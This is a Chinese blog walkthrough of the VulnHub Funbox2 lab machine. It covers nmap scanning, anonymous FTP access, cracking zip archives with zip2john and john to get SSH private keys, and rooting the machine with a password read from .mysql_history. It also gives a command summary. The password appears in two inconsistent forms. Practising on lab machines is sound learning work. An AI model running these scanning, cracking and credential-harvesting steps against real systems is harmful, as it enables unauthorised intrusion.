VulnHub靶机-Funbox2

VulnHub靶机-Funbox2

靶机地址:https://download.vulnhub.com/funbox/Funbox2.ova

配置环境

攻击机-VMware-桥接(复制)-kali

靶机-VirtualBox-桥接-(网卡根据网络连接状态选择)#在非校园网,校园网会分配到不同的网段

ps.如果靶机开着的情况修改网络连接方式,是需要重启的!

请添加图片描述

信息搜集

nmap扫描
nmap -sS 172.20.10.0/24
#172.20.10.0是本机的网关
#nmap -sP 是。。。# /24是。。。
#sS比较好看

请添加图片描述

nmap -p22,80 -A 172.20.10.2
#看一下ssh,http端口

请添加图片描述

http有个robots.txt

http://172.20.10.2/robots.txt

一脸懵,f12也没什么东西,http这个方向先pass

ssh不知咋搞,先pass

FTP渗透

连接ftp:ftp匿名访问

ftp 172.20.10.2

user:anonymous passwd:空

ls -la

下载ftp的文件

wget -r ftp://172.20.10.2

join爆破
zip2john anna.zip > anna
……
john anna --wordlist=/usr/share/wordlists/rockyou.txt

tom.zip获得itom/iubire

cathrine获得cathrine/catwoman

以上为ssh用户的私钥

ssh公钥认证

cat .@users

说明keys在zip里面,解压zip

unzip cathrine.zip

解压cathrine.zip获得id_rsa

ssh -i id_rsa cathrine@172.20.10.2

登录失败

解压tom.zip获得id_rsa

ssh -i id_rsa tom@172.20.10.2

登录成功

尝试提权-利用mysql

先习惯性检查文件

注意到.mysql_history

cat .mysql_history

请添加图片描述

发现tom的密码是xx11yy22!

尝试提权

su root

xxqqyy22!

请添加图片描述

cd回到根目录

ls

cat flag.txt

请添加图片描述

成功啦~

总结:

1.信息搜集:nmap看ftp,ssh,http三大端口,走不通就换条路

nmap -sS 攻击机IP/24

2.ftp匿名登录:anonymous/空密码

ftp 靶机IP
anonymous/空

3.ftp文件下载:wget -r ftp://IP

wget -r ftp://IP

4.join爆破zip

zip2john A.zip > A
john A --wordlist=/usr/share/wordlists/rockyou.txt

5.ftp下载的文件好像都是用户信息,按照hint解压获得id_rsa

unzip A.zip

6.id_rsa用于登录ssh

ssh -i id_rsa A@靶机IP

7.尝试提权:mysql_history中有用户密码

ls -la
cat mysql_history
su root
输入密码
ls -la
cd回到根目录
cat flag.txt

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值